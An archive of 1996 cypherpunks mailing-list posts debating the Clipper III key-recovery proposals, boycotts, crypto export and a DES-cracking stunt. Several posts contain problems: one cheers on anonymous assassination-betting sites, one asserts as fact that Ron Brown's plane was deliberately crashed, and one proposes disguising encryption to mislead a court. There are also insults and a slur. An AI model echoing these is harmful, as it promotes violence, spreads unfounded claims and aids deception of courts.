From: jim bell <jimbell@pacifier.com>
Date: Fri, 4 Oct 1996 21:33:39 +0800
To: Robert Hettinga <cypherpunks@toad.com
Subject: Re: "Macintosh -- the Surveillance System for the Rest of Us
Message-ID: <199610040340.UAA09668@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:48 PM 10/3/96 -0400, Robert Hettinga wrote:
>At 7:13 pm -0400 10/3/96, Timothy C. May wrote:
>> "Macintosh, the Surveillance System for the Rest of Us."
>>
>> (Why Apple would go along with this, while Microsoft and Netscape are
>> apparently not playing ball, is incomprehensible to me. Apple risks
>> alienating its remaining core user base, who often characterize Microsoft
>> as "the Borg." So, Apple capitulates, while MS does not. I guess the
>> "Macintosh Crypto Forum" didn't do a lot of good, did it?)
>
>Ouch.
>
>My first reaction to the above was to say, "Oh, Yeah??? Well, you're ugly,
>buddy, and your mother dresses you funny, too!" But, I won't upset the
>decorum of so august a forum with such eggregious classlessness. Not here
>on cypherpunks. :-).
>
>
>If one were to be completely uncharitable in the interpretation of Tim's
>most recent outbreak of vitriol here, it would seem that he's offended that
>he wasn't asked first to be the keynote at MacCrypto, the conference a
>bunch of us had at Apple a month ago, which, I might add, was a
>considerable success.

I know what probably happened. A new high-level manager at Apple picked up 
some old dusty videotape off the shelf, labelled "Super Bowl 1984", played 
it and said, "Yah know, that guy on the screen was making a hell of a lot of 
sense until that trouble-makin' bitch smashed it!"


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 4 Oct 1996 12:07:44 +0800
To: aba@dcs.ex.ac.uk>
Subject: Re: boycott GAKkers (was Re: NYT on IBM GAK)
In-Reply-To: <199610031402.PAA00388@server.test.net>
Message-ID: <Pine.LNX.3.95.961003203339.1382B-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 3 Oct 1996, Adam Back wrote:

> (I've seen HP, Sun, RSADSI, TIS, Apple, Atalla, DEC, Groupe Bull, IBM,
> NCR Corp., and UPS mentioned).  Any confirmations?  Denials?

IBM and TIS are definitely pro-GAK.  TIS is selling a firewall that uses
GAKked DES.  IBM has been working on developing the "key recovery" technology.
The article posted here a while ago that told of IBM's plans to support GAK
also said that they were planning to license the technology to Sun and
Netscape.  I don't know about the accuracy of that last statement.

Mark
- -- 
PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMlRcsCzIPc7jvyFpAQEiIwf/btvAiIVHF3alGh+Vivr3MoHnSSciFjGX
qhqdS+SEsM4cTxE+y8vvfpHFs/faQPmWLgT70lyf1pJ+Avei7brieb/qWoC5q9MJ
gBlSa1f2yVMY7ax+KPTwU+Yk63A7oi964d+ebCp51BLOtzKammRlIw/nBFuDMq/5
ss2a4w4PuOEOP35WQIy0i8NBoJxEi5gHx5J/+gGzWK9iw/yZa0xyoT25ci6uh7mJ
sPgNmedr/Pq+D5gk5GduGgGni/jrDeADH0K7R0M8Jqlh0Xc82NPkau8xwZAXDMJV
947PF56souwrx3BHmj7fXPXIVBJEjWy/Ymv2N8LBm+BHS09CN0ns5Q==
=URZJ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: apteryx@super.zippo.com (Mark Heaney)
Date: Fri, 4 Oct 1996 11:50:27 +0800
To: cypherpunks@toad.com
Subject: Re: Fighting Clipper III
Message-ID: <325b245d.288509144@super.zippo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

erm, a boycott means not _buying_ a product, as opposed to not _using_ a
product. In the case of PGP, I never intended to purchase it from RSA. As
for Netscape, there are other browsers out there (or so I heard). 

Realistically, a boycott is likely to be ineffective. Writing letters to
companies and congresshmucks and working with non-US crypto companies to
create a standard that can be legally imported into the US (for now) would
be more effective, IMHO. Boycotts rely on large numbers of participants,
and not enough people understand or care about encryption. We'd be better
off trying to change that first.

Mark


On Thu, 3 Oct 1996 06:37:45 -0700 (PDT), Declan McCullagh <declan@eff.org>
wrote:

>You'll have trouble doing a successful boycott of RSA. What, you won't 
>use Netscape Navigator or PGP?
>
>-Declan
>
>
>On Wed, 2 Oct 1996, Jim McCoy wrote:
>
>> Rich Burroughs <richieb@teleport.com> wrote:
>> [...]
>> >>>On Wed, 2 Oct 1996, John Young wrote:
>> >>>
>> >>>>    The New York Times, October 2, 1996, pp. D1, D8.
>> >>>>    Executives of the International Business Machines
>> >>>>    Corporation said late yesterday that they were still lining
>> >>>>    up the final list of companies in the alliance. Those
>> >>>>    involved will include Digital Equipment and smaller
>> >>>>    data-security companies including RSA Data Security, Cylink
>> >>>>    and Trusted Information Systems.
>> >>>
>> >>>We are in deep trouble.
>> >>
>> >>Wouldn't a letter-writing campaign be in order here?
>> >[snip]
>> >
>> >The word "boycott" leaped into my mind.  I personally do not believe that I
>> >will be buying products from any of these companies, as long as thay
>> >participate in this GAK charade.
>> 
>> Such an initiative will need publicity and letter-writing early in the
>> campaign will help us set the tone and points of debate on this issue.
>> A boycott works best when everyone knows why and there are a few key
>> phrases which can be used to get the message across.  Something like
>> "company X is helping build big brother, boycott their products" or a
>> few similar sound bites are needed fast.  The big brother inside stickers
>> from the last campaign were nice, maybe people can come up with variations
>> of various corporate logos or marketting phrases which help get the message
>> across?
>> 
>> jim
>> 
>> 
>
>
>// declan@eff.org // I do not represent the EFF // declan@well.com //
>
>
>


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMlQmC936bir1/qfZAQF9dwL/fN1HZhHWbnOa6gZ71WMwf32nuOGS1CGm
H2f9MlNvZhYF6TVAwCmfUG4hgeJQLkC97GrR/0hIfNYzir0Eb+qmF2Mptvl5tUiJ
I89H2WRVl+BJBoqThGXJx8BqL6uVDX9H
=sBVJ
-----END PGP SIGNATURE-----

Mark Heaney    finger snipe@starburst.cbl.cees.edu for public key
PGP Fingerprint= BB D8 9B 07 51 87 05 AC  47 7B F2 4F A6 AB 1A CD   
-----------------------------------------------------------------
   Vote against government        ***        Vote Libertarian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 4 Oct 1996 12:19:46 +0800
To: cypherpunks@toad.com
Subject: Re: "Macintosh -- the Surveillance System for the Rest of Us
In-Reply-To: <Pine.3.89.9610031350.A13226-0100000@netcom14>
Message-ID: <v03007801ae79f27cb8c3@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:13 pm -0400 10/3/96, Timothy C. May wrote:
> GAK, or Girlfriend's Access to Keys, is indeed a very scary thing.

Ah.  Maybe we should cross-post this to alt.tasteless?

> "Macintosh, the Surveillance System for the Rest of Us."
>
> (Why Apple would go along with this, while Microsoft and Netscape are
> apparently not playing ball, is incomprehensible to me. Apple risks
> alienating its remaining core user base, who often characterize Microsoft
> as "the Borg." So, Apple capitulates, while MS does not. I guess the
> "Macintosh Crypto Forum" didn't do a lot of good, did it?)

Ouch.

My first reaction to the above was to say, "Oh, Yeah??? Well, you're ugly,
buddy, and your mother dresses you funny, too!" But, I won't upset the
decorum of so august a forum with such eggregious classlessness. Not here
on cypherpunks. :-).


If one were to be completely uncharitable in the interpretation of Tim's
most recent outbreak of vitriol here, it would seem that he's offended that
he wasn't asked first to be the keynote at MacCrypto, the conference a
bunch of us had at Apple a month ago, which, I might add, was a
considerable success.

Of course, the real irony here is that Tim *was* the first person we asked
to keynote. The irony compounds itself slightly more when you consider the
*last* person who we asked, Phil Zimmermann, at the *last* possible minute,
graciously accepted our invitation and delivered his keynote speech to a
very enthusiastic crowd.

Unfortunately, it may be a speaking engagement Phil regrets now, in light
of Apple's apparent participation in the most recent Washington GAK-fest.
:-{.


Anyway, let us *be* charitable, and take Tim's apparent vituperation about
Apple's complete capitulation to government pressure, not to mention the
appalling failure of the MacCrypto conference to lob any clues over the
walls of Fortress Apple, entirely at their face value, shall we?

Let's assume that he really *wasn't* trying to rattle the bars on the Mac
crypto community's collective cage, and that he actually was trying to
contribute something constructive to what appears to be a *truly* apalling
situation to anyone who wants strong crypto, and thus internet commerce, to
be transparent and easy to do on the Macintosh. The Mac crypto community's
cage is plenty rattled by the recent news from Washington, as it is.


With that in mind, the best thing most of us can figure is that Ellen
Hancock, Apple's chief technology officer, freshly hired from IBM, is in
the process of pulling the same kind of crypto-boner for Apple that
Netscape's CEO did last year about this time. Frankly, people who run
industrial organizations like Apple, and, I might add, Microsoft, don't
really understand yet that internet commerce *is* financial cryptography,
and, of course, that means strong, and un-GAKked, crypto.

I'm sure that the people on the mac-crypto list and the rest of the Mac
internet community in general will disabuse her of this notion rather
quickly.


By the way, most of the hard core of 70 or so people who came to the
MacCrypto conference, those who sat through the whole thing from start to
finish, were from outside Apple. Clearly, as far as crypto on the Mac goes,
the word "evangelism" cuts both ways.

However, we got some very good stuff from the Apple folks who did come,
including a soon to be released entropy manager -- with public source code
-- and a public-key "keychain" project -- with public source code -- , and
a volunteer of development participation in serious crypto projects from an
Apple fellow (who, by definition, can do anything he wants) and his staff.


Frankly, I'd rather see actual code being written than press releases,
wouldn't you, Tim?

Even if the code isn't on an Intel Pentium Pro 200 using the Microsoft
CryptoAPI...

Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aaron@burn.ucsd.edu (Aaron)
Date: Fri, 4 Oct 1996 20:27:30 +0800
To: aaron@burn.ucsd.edu (All my recipients)
Subject: Uruguayan 'pirate' radio seized
Message-ID: <v0213050bae7a346070ca@[128.48.140.40]>
MIME-Version: 1.0
Content-Type: text/plain


I thought that I had sent this out already to my various private lists, but
it appears that I haven't.  From my perspective of involvement in Free
Radio and support for armed struggle, I consider it important.

Feel free to redistribute this.  If you can improve the translation, or
find additional information, please send me a copy.

--Aaron

The Spanish original follows my translation.

La Jornada (Mexico), 23 September 1996
Uruguayan pirate radio equipment seized; transmitted EZLN messages.

Ap y Dpa, Montevideo, 22 de septiembre.  Uruguayan military intelligence
services confiscated the transmission equipment of a clandestine radio
station that broadcast messages of Mexico's EZLN, according to the Defense
Minister, Raúl Iturria. He speculated that it could have involved the
promotion of collective armed uprisings, and possible terrorist acts.

According to a report in the Uruguayan periodical El País, the raid on the
broadcaster 'La Intrusa', located in the Montevideo suburban barrio of La
Teja, allowed the discovery of "subversive plans" and radio messages sent
from the Lacandon jungle and from Nicaragua, although not 'codified' by the
military intelligence services. [Can any Spanish speakers clarify the last
clause? See original below.--Aaron]

The Nicaraguan instructional materials contained formulas, systems of
putting together explosives, and some suggestions for illegally obtaining
the various materials necessery for the armaments to reach their maximum
potency.

The instructions were put to music, with Central American rhythm,
explaining directly and even joyfully the means of equipping any group.

In the international communications broadcast by the pirate radio,
reporters, presumably Uruguayan, reported from the Mexican jungle "whole
chapters of tactics useful for confronting the enemy", and these made
reference to impending contact with unidentified inserrectional forces of
Chile, according to the newspaper.

According to a Uruguayan broadcast official, the police operation also
allowed the seizure of propaganda material and materials for making molotov
cocktails that  were used by members of the pirate radio station against
patrol vehicles in their area of operation.

*******************************************

La Jornada 23 de septiembre de 1996
Confiscaron en Uruguay equipo de radio que difundía mensajes del EZLN.

Ap y Dpa, Montevideo, 22 de septiembre.  Los servicios de inteligencia
militar de Uruguay confiscaron los equipos de transmisión de una estación
de radio clandestina que difundía mensajes del movimiento rebelde Ejército
Zapatista de Liberación Nacional, de México, informó hoy el ministro de
Defensa, Raúl Iturria, quien especuló que podría tratarse de la promoción
de alzamientos armados colectivos, y eventuales acciones terroristas.

De acuerdo con información del periódico matutino uruguayo El País, el
allanamiento a la radiodifusora La Intrusa, ubicada en el barrio suburbano
La Teja, de Montevideo, permitió descubrir ``planes subversivos'' y
mensajes radiales enviados desde la Selva Lacandona y de Nicaragua, aún no
codificados por los servicios de inteligencia militar.

El material instructivo nigaragüense contenía fórmulas, sistemas de
ensamblado para explosivos y algunas sugerencias para la obtención ilegal
de los distintos materiales necesarios para que el armamento alcanzara su
máxima potencia.

Las indicaciones eran musicalizadas, con ritmo centroamericano, dijo, al
explicar directa y hasta alegremente el modo de pertrechar a cualuqier
grupo.

En las comunicaciones internacionales difundidas por la radioemisora
pirata, reporteros, presumiblemente uruguayos, informaban desde la selva
mexicana ``capítulos enteros de tácticas ejecutables para enfrentar al
enemigo'', y en ellos se hacía referencia a un próximo contacto con fuerzas
insurrectas de Chile aún no identificadas, precisó el diario.

Así, el operativo policial permitió incautar, además, material de
propaganda y elementos para la fabricación de cocteles molotov que, según
dijo el director nacional de Comunicaciones de Uruguay, Ernesto Dhel, eran
utilizados por los miembros de la radioemisora ilegal, contra los vehículos
de patrullaje instalados en su área de acción.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Fri, 4 Oct 1996 20:49:03 +0800
To: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Subject: Re: The Right to Keep and Bear Crypto
Message-ID: <v02130500ae79cef28e84@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>No. And No.  This argument will never fly in any court.
>
>If you want to see why, go to my homepage
>
>http://www.law.miami.edu/~froomkin
>

Thanks, the material was indeed informative.  Some great work!

However, I found much disturbing.  The inference that the Exec branch could
on the one hand classify crypto as a munition ('arms' by any other name),
while for constitutional purposes the Courts may not exposes a deep-seated
legal duplicity.

Constitutional interpretations over the past century not withstanding, it
is clear (to me) that a substantial number of the Framers would abhor what
has become of the Second Amendment's ... right to keep and bear arms.

One of the primary reasons put forth by the Framers for such a right was in
order to resist the an oppressive state.

        The strongest reason for the people to retain the right to keep
        and bear arms is, as a last resort, to protect themselves against
        tyranny in government.
                                  --Thomas Jefferson

        When firearms go, all goes. We need them every hour.
                                  --George Washington

It is ludacrous to expect citizens armed with no more than side arms,
bolt-actions and shot guns to resist the actions of a modern military or
law enforcement which citizens may find in violation of their inaliable
natural rights (whether mistaken or not).  In my opinion, all citizens
should be be able to keep and bear any arms (without registration) which
the state might use against them.   To do so now is a criminal action.  So
be it.

Unfortunately, it is common for groups especially governmental to be come
statist, mean spirited and eventually malevolent.

I hope jim bell or his ilk are soon successful at putting up functional,
anonymous and active AP sites.  I can't wait to wager!

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Fri, 4 Oct 1996 09:16:00 +0800
To: Declan McCullagh <declan@eff.org>
Subject: Re: Fighting Clipper III
In-Reply-To: <Pine.SUN.3.91.961003063629.18620C-100000@eff.org>
Message-ID: <Pine.LNX.3.94.961003210853.890B-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Oct 1996, Declan McCullagh wrote:

> Date: Thu, 3 Oct 1996 06:37:45 -0700 (PDT)
> From: Declan McCullagh <declan@eff.org>
> To: Jim McCoy <mccoy@communities.com>
> Cc: cypherpunks@toad.com
> Subject: Re: Fighting Clipper III
> 
> You'll have trouble doing a successful boycott of RSA. What, you won't 
> use Netscape Navigator or PGP?
> 
> -Declan
> 

A boycott isn't necisarily non-_USE_.  I'll still use DEC machines,  I
just won't purchase any new ones (as if I could afford to anyway).  I have
PGP,  I've been using PGP,  I will use PGP.  But I'm not going to buy
anything from RSA, even if I previously had been inclined to.


 --Deviant
Try `stty 0' -- it works much better.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 4 Oct 1996 23:32:01 +0800
To: Deana Holmes <mirele@xmission.com>
Subject: Re: Utah as a Religious Police State [RANT]
In-Reply-To: <199610021832.MAA17915@mail.xmission.com>
Message-ID: <3254976E.7F3@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Deana Holmes wrote:
> On  2 Oct 96 at 8:47, John C. Randolph wrote:
> > Moroni says:
> > >I never cease to be surprised by the interest that gentiles show
> > >in working mormon communities while totally neglecting their own
> > >failing areas.

> > I don't do a lot of nit-picking on this mailing list, but:
> > I am a Jew. *You* are a gentile. So are all the rest of the mormons.
> > Get this point straight.

> Uh, in Utah, Jews are Gentiles. No lie.

I hope I can add something useful to this:

There are quite a few religious groups which claim Zionist spinoff 
beliefs.  Rastafarians (spelling OK?), Mormons, Jews, Christians, and 
probably a host of others.  Some of these groups specifically exclude 
others who make similar claims.  There is good evidence that the Jews, 
to name one example, did not originally (whenever that was) make claim 
to being a Chosen People, etc., but added it later.  Certainly Mormons 
and other Christians "added it later", no question about that.

St. Paul in the Christian "new testament" makes it quite clear that, at 
least from his time onward, the value of being a Jew is in the spirit, 
not in the flesh.  Deep stuff, indeed.

Then there's the question of how one obtains the "right to exist" as an 
ethnic identity, hopefully without having to exterminate someone else.
I for one was raised in a very conservative Christian culture, and we 
were taught that God "gave" Canaan (later Israel) to the Israelis, when 
it was already occupied.  Refer to Dick Gregory's comments about 
Columbus "discovering" America, and how he should be able to go downtown 
and "discover" himself a Cadillac.

BTW, in a review of HP products I once read (they made the first 
personal computers, circa 1966 I believe), it said that HP people, in 
their main plants in Corvallis OR and Ft. Collins CO, had a really great 
"work ethic", and that they were almost all Mormons and "born again" 
Christians.  That probably says more about homogenous culture than about 
any particular culture, I would guess.

Bottom line for me is, I sincerely appreciate a lot of the good values 
some of these religions bring to their followers, but let's be serious, 
if any of these groups get too much power, look the *hell* out!

P.S.  I cringe every time I hear one of the CNN bozos pronounce Israel
      as in real estate, or get real.  I think they all have to attend
      the Rick Dees school of broadcasting, so it's a standard, like
      GAK or something is going to be the standard.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 4 Oct 1996 13:04:10 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Margaret Milner Richardson loses her breakfast...
In-Reply-To: <v03007802ae79fed8a057@[206.119.69.46]>
Message-ID: <199610040157.VAA12344@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Robert Hettinga writes:
> Ms. Richardson said: "How would you like to be responsible for
> administering tax laws and have to read these ads over breakfast?"

I'd love it. Imagine the increases in enforcement budgets...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Fri, 4 Oct 1996 15:25:58 +0800
To: cypherpunks@toad.com
Subject: How to fight GAK by obeying the law
Message-ID: <199610040457.VAA25485@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


It seems that the best method for fighting GAK is to accelerate
wide-spread domestic use of freely redistributable non-GAK crypto.

The Lynux automatic firewall concept that John Gilmore is pushing is a
great idea, but it is still brewing, and he's shooting for developing
an exportable ... er ... importable version.  That will take much time
to develop, and time is what we don't have much of.

We need to work on applications, API's, flexible software modules, etc.
and the primary reason we cannot do it so easily is because we cannot
redistribute the software so easily.

First thing we definitely need is a way to determine with fairly good
accuracy, whether a host is in the U.S.  This MUST be an automagic
mechanism ...  no person involved so there is little delay in getting
the goodies.  The best implementation would automatically set the
group of an incoming anonymous FTP session daemon to a special group
if there is a high degree of certainty that the originating host is
within the U.S.

Second thing we definitely need is a convenient way and universal way
to clearly notify the recipient of the current export restrictions of
such software, so that the recipient knows what he/she is in for.

Basically, we have to do our best to NOT violate the law, no matter
how much we hate it.  What the government wants to happen is that
everyone will get hooked on GAK, and it will be too inconvenient to
use something else.  A good counter-strategy is to get everyone hooked
on the good stuff.

Right now, the FBI/NSA is looking for an excuse to prosecute anyone
not jumping on their bandwagon.  We have to avoid give them an excuse
to prosecute us while still enabling rapid application development.

Communication and distribution are key.

Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 4 Oct 1996 13:13:57 +0800
To: cypherpunks@toad.com
Subject: Re: "Macintosh -- the Surveillance System for the Rest of Us
In-Reply-To: <v03007801ae79f27cb8c3@[206.119.69.46]>
Message-ID: <uJ69uD29w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Robert Hettinga <rah@shipwright.com> writes:

> If one were to be completely uncharitable in the interpretation of Tim's
> most recent outbreak of vitriol here, it would seem that he's offended that

Tim is an ignorant asshole who knows nothing about cryptography and floods
this mailing list with inane rants and personal attacks.  I recommend that
he be massively killfiled.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 4 Oct 1996 14:13:15 +0800
To: alano@teleport.com (Alan Olsen)
Subject: Re: Clipper III on the table
In-Reply-To: <3.0b16.32.19961003170416.00bafcd8@mail.teleport.com>
Message-ID: <199610040321.WAA00736@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Alan Olsen wrote:
> I think we should refer to what they are pushing as the "Key Recovery
> Alliance Program".  K.R.A.P. is a good description as to what we are going
> to get from them.

Key recovery is a great thing, as long as it is not mandated by
the government.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 4 Oct 1996 20:14:36 +0800
To: Ernest Hua <hua@chromatic.com>
Subject: Re: Conspiracy Stuff: Ron Brown's death and Crypto ...
In-Reply-To: <199610030600.XAA20074@krypton.chromatic.com>
Message-ID: <3254A3E8.2DFC@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Ernest Hua wrote:
> Too much fun for the conspiracy buffs ...
> Did Ron Brown's plane really fly off course due to pilot error?
> No, don't even bother replying to me on this matter.  I'm just
> up too late, and I tossing this one out there on a whim ...

Sorry, but you asked.  Brown's plane was deliberately guided into a 
mountain by a different tower signal than was guiding it in mid-flight.
Someone had the real tower kill or redirect their signal so the second 
tower or whatever could switch in.

I thought everyone knew that.

Bear in mind, when you first go to work for a U.S. intel agency, the 
first thing they teach you is "there are no coincidences" (of any real 
significance).  And how fortunate for Mr. Eisner and his hundreds of 
millions in personal income per year that Frank Wells (Mr. Disney's 
protege) expired in that helicopter(?) crash a couple years ago.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Fri, 4 Oct 1996 14:26:03 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Flood Warning
Message-ID: <199610032303.XAA22678@pipe2.ny1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Oct 03, 1996 10:30:37, 'jim bell <jimbell@pacifier.com>' wrote: 
 
>>   High-Tech Leaders Join Forces to Enable International  
>>   Strong Encryption  
>>  
>>      See: http://www.ibm.com/news/alliance2.htm  
> 
>This is apparently no longer valid.  Is there a new one? 
 
----- 
 
 
Sorry. It seems that you need to go through IBM's home page at: 
www.ibm.com, then follow the links to the full press release where the URL
above comes up. This is the release that most of the media parroted. It
does include hand-rubbing quotes by industry rats, er, finks. 
 
 
Anybody who can't get through and wants the PR-dirty, send me a blank
message with the subject:  RAT_ibm 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: majordomo@dws008.ako.dec.com
Date: Fri, 4 Oct 1996 20:43:42 +0800
To: cypherpunks@toad.com
Subject: Majordomo results: mailto:pr-news@pa.dec.com
Message-ID: <9610040303.AA08635@dws008.ako.dec.com>
MIME-Version: 1.0
Content-Type: text/plain


--

>>>> What is DEC's official position regarding the new Clipper III proposal?
**** @_
**** No valid commands found.
**** Commands must be in message BODY, not in HEADER.

**** Help for majordomo@dws008.ako.dec.com:

This is Brent Chapman's "Majordomo" mailing list manager, version 1.93. 

In the description below items contained in []'s are optional. When
providing the item, do not include the []'s around it.

It understands the following commands:

    subscribe <list> [<address>]
	Subscribe yourself (or <address> if specified) to the named <list>.

    unsubscribe <list> [<address>]
	Unsubscribe yourself (or <address> if specified) from the named <list>.

    get <list> <filename>
        Get a file related to <list>.

    index <list>
        Return an index of files you can "get" for <list>.

    which [<address>]
	Find out which lists you (or <address> if specified) are on.

    who <list>
	Find out who is on the named <list>.

    info <list>
	Retrieve the general introductory information for the named <list>.

    lists
	Show the lists served by this Majordomo server.

    help
	Retrieve this message.

    end
	Stop processing commands (useful if your mailer adds a signature).

Commands should be sent in the body of an email message to
"majordomo@dws008.ako.dec.com".

Commands in the "Subject:" line NOT processed.

If you have any questions or problems, please contact
"majordomo-Owner@dws008.ako.dec.com".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 4 Oct 1996 17:42:04 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: support for "crack DES"
In-Reply-To: <199610032143.OAA13883@mail.pacifier.com>
Message-ID: <3254AE32.1DFA@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:
> At 01:26 PM 10/3/96 +0000, Omegaman wrote:
> >Considering the situation -- considering that RSA has even signed on
> >to this scheme -- I'd have to say that I don't give a rat's ass what
> >Bill Gates claims.  If Micro$oft bucks the system, I'll gladly
> >applaud their stand.
> >The situation is not good at all.
> >Cracking DES (whether distributed or through a hardware crack, or
> >both!) seems critical at this point.

> Just remember that it would be far better to make the crack look easy,
> than to make it look hard.  quantity 9000+, $1,000 Pentiums for a year
> (plus maybe $500,000 in electricity) looks "hard."   1000 dedicated
> chips (whether they be FPGA or custom or...) for 1.5 months or so
> looks "easy."
> The latter crack looks far more likely to be repeated.  The former is
> OBVIOUSLY a stunt.

I don't know from discussion here whether anyone wants to take this in 
front of one of those C-Span Congress hearings or not; it's not that 
hard to do if you weasel your way in with the right folks....

Timing is important, and the element of surprise.  From what I hear, 
Sen. Specter was hoping to gild his bid for the pres. race with his 
hearings on militias et al, then he got sideswiped by some smarter 
people who had documents in hand.

If "the box" is ready at the right time, and you can catch the politicos 
at a moment when they're increasing their ambition, it could make a 
heckuva bang.

The fundamental laws of logic (via Joey the Hit Man):
Never steal from the boss,
never, ever rat on the boss,
and above all, don't get too ambitious.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McCoy <mccoy@communities.com>
Date: Fri, 4 Oct 1996 17:06:18 +0800
To: cypherpunks@toad.com
Subject: Re:Clipper III questions
In-Reply-To: <199610040135.SAA24060@slack.lne.com>
Message-ID: <v03007801ae7a6c99cadc@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


>The recent CDT policy post sez of Clipper III:
>
>>* Access to keys internationally "would be provided in accordance with
>>  destination country policies and bilateral understandings."
>
>
>This reminds me of the understanding between CIA/NSA and their counterparts
>in British Intelligence.  [...]

While I am not sure that this oft-made claim can actually be proven,
it does raise an interesting point:  a large amount of communications
traffic crosses international boundaries, which country's laws and
procedures are to be followed when a "legitimate law enforcement need"
is perceived?  While Americans have become somewhat disenchanted with
protections given to American suspects via our Fourth Amendment, a
possible line of attack upon Clipper III might be that those who
want to monitor communications will select the jurisdiction in which
it is easiest for them to get a court order.

While "coddling criminals" and "throwing out evidence based upon
technicalities" has a negative PR value, Americans are a cheuvanistic
lot who tend to go completely ballistic when told that they must be
subject to the laws of another country, and given the nature of internet
communications this might be something which could be used to our advantage.
Something like "Clipper III is giving away your First Amendment rights in
cyberspace and replacing them with the restrictive expresion laws of
Country X, is that what you really want?"

The international angle may be a good card to play in the American debate.
>From a law-enforcement point of view international communications gives
them little to work with: there are already numerous articles which can
be quoted pointing out that terrorists [insert optional horseman] already
have access to strong crypto so Clipper III will not catch them, the only
thing it is good for is spying on honest Americans... :)

jim

p.s.  On the commercial side, the known economic espionage cases of the
French and Japanese governements may also be points to raise.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 4 Oct 1996 17:03:56 +0800
To: Eric Murray <ericm@lne.com>
Subject: Re: gack vs. key escrow vs. key recovery
In-Reply-To: <199610040153.SAA24250@slack.lne.com>
Message-ID: <3254B26B.700E@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Eric Murray wrote:
> Vladimir Z. Nuri writes:
> > cpunks, a note about recent developments in "key recovery" initiative.
> > is the government always going to be your
> > enemy, no matter what they do?

> It seems to be bent on doing so.

> > I have posted here before that many companies find the concept
> > of "key recovery" highly acceptable and even desirable. the
> > basic question is, what does this mean to wiretapping and
> > search warrants and subpoenas?

> They get served, and the keys are produced.  Same with personal
> crypto- if I'm in court and some encryped file that I have the
> key for is demanded as evidence, I provide the key or get
> hit with contempt of court, my choice.
> No one is arguing about that.  The objections to Clipper III are:

[additional text deleted]

Sounds to me like there's a need for a program that can produce secure 
encryption, yet the output looks like "real junk", i.e., not anything 
like what one of the *better* programs would produce.  Then you can 
claim (with testimony of experts if necessary) that "I didn't encrypt 
it, must be just garbage".  And even if you got some bozo govt. person 
testifying against you, you shouldn't have much problem making them look 
stupid and vindictive in front of a jury.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@cnw.com>
Date: Fri, 4 Oct 1996 19:42:37 +0800
To: "cypherpunks@toad.com>
Subject: RE: gack vs. key escrow vs. key recovery
Message-ID: <01BBB187.08797720@king1-18.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Vladimir Z. Nuri, [who still doesn't get it]

